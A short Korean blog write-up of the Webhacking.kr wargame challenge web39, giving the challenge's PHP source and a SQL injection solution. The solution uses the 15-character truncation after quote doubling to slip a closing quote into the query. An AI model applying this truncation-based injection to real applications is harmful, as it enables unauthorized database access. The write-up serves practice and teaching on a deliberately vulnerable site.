Post

Webhacking.kr - web39

Wargame, Webhacking.kr
Posted

web39

1
2
3
4
5
6
7
8
9
10
11
12

<?php
  $db = dbconnect();
  if($_POST['id']){
    $_POST['id'] = str_replace("\\","",$_POST['id']);
    $_POST['id'] = str_replace("'","''",$_POST['id']);
    $_POST['id'] = substr($_POST['id'],0,15);
    $result = mysqli_fetch_array(mysqli_query($db,"select 1 from member where length(id)<14 and id='{$_POST['id']}"));
    if($result[0] == 1){
      solve(39);
    }
  }
?>

Solution

1
2
3
4
5
6
7

\ -> 공백, ' -> ''

substr로 15글자를 자른 뒤 쿼리에 넣으므로 마지막 15글자에 '을 넣어주면 됨.
id : 1             '
select 1 from member where length(id)<14 and id='1             '

한가지 의문점은 테스트 환경에서는 안되었다는 점..
Wargame, Webhacking.kr
This post is licensed under CC BY 4.0 by the author.